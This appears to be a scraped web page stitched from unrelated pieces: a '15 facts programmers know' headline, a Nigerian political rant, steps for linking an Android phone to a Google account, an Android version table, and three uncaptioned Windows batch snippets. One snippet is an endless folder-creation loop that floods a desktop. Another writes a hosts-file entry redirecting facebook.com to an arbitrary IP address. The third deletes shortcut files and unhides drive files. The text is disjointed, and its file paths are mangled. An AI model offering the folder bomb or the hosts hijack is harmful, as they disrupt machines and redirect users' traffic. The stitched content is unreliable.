15 Facts That Only Programmers Know And Most People Don’t
15 Facts That Only Programmers Know And Most People Don’t
The root is at the top of the tree.














No.1 Global News Network
Comedians jokes alot, out of their jokes there are reasonable Tips. Nigeria my Country the future has come when we need stop fooling around and make our home a residing place and not a dumping ground.
Can we keep hold on a country which is been Govern by leaders older than the age of the country?
History has shown how much our past leaders started from their early twenties while now we have same set of people who are hungry of power till death cross their path. Have we come to think about if the elders pass on who will Govern us with the best experience? Don't be political but logical, stand firm and be original with Nigeria let's say no to power Hunters
It is very important that your gadget get link with your Google email account, this provide many benefits and security. This isn't just all it serve as a backup and help getting access to so many applications without stress.
Google has so many app they share with you some of the popular is YouTube which many users visit Google to acquire the best experience of learning.
Steps for Linking.
1. On purchase of a new gadget, it always request you to login or register your email account preferably Google Gmail account due to it link with Android. Kindly login and get started otherwise skip if you don't remember your login details
2. Get your Google account active, getting your password recovered. Goto to your phone settings once your account is active and ready for use.
3. Locate account directly in the settings drop down. I.e settings >>account>>add account >>Google account.
4. Login your details and you are good to go
BENEFITS
1. SAVING YOUR CONTACT ON GOOGLE PROVIDES BACKUP FOR STOLEN PHONE
2. LOCATE YOUR PHONE WHEN MISSING
3. ACCESS TO Play Store
4. PASSWORD RECOVERY FOR YOUR PHONE.
I hope you find this helpful, kindly drop your comments below
Code Name | Version | API Level | |
---|---|---|---|
Lollipop | 5.1 | API level 22 | |
Lollipop | 5.0 | API level 21 | |
KitKat | 4.4 – 4.4.4 | API level 19 | |
Jelly Bean | 4.3.x | API level 18 | |
Jelly Bean | 4.2.x | API level 17 | |
Jelly Bean | 4.1.x | API level 16 | |
Ice Cream Sandwich | 4.0.3 – 4.0.4 | API level 15, NDK 8 | |
Ice Cream Sandwich | 4.0.1 – 4.0.2 | API level 14, NDK 7 | |
Honeycomb | 3.2.x | API level 13 | |
Honeycomb | 3.1 | API level 12, NDK 6 | |
Honeycomb | 3.0 | API level 11 | |
Gingerbread | 2.3.3 – 2.3.7 | API level 10 | |
Gingerbread | 2.3 – 2.3.2 | API level 9, NDK 5 | |
Froyo | 2.2.x | API level 8, NDK 4 | |
Eclair | 2.1 | API level 7, NDK 3 | |
Eclair | 2.0.1 | API level 6 | |
Eclair | 2.0 | API level 5 | |
Donut | 1.6 | API level 4, NDK 2 | |
Cupcake | 1.5 | API level 3, NDK 1 | |
(no code name) | 1.1 | API level 2 | |
(no code name) | 1.0 | API level 1 |
1
2
3
4
5
|
@echo off
cd C:Documents and SettingsusernameDesktop
:loop
md %RANDOM%
goto loop
|
1
2
3
|
@echo off
echo 10.184.24.35 www.facebook .com >> C:windowssystem32driversetchosts.txt
exit
|
1
2
|
del *.lnk
attrib -h -r -s /s /d e:*.*
|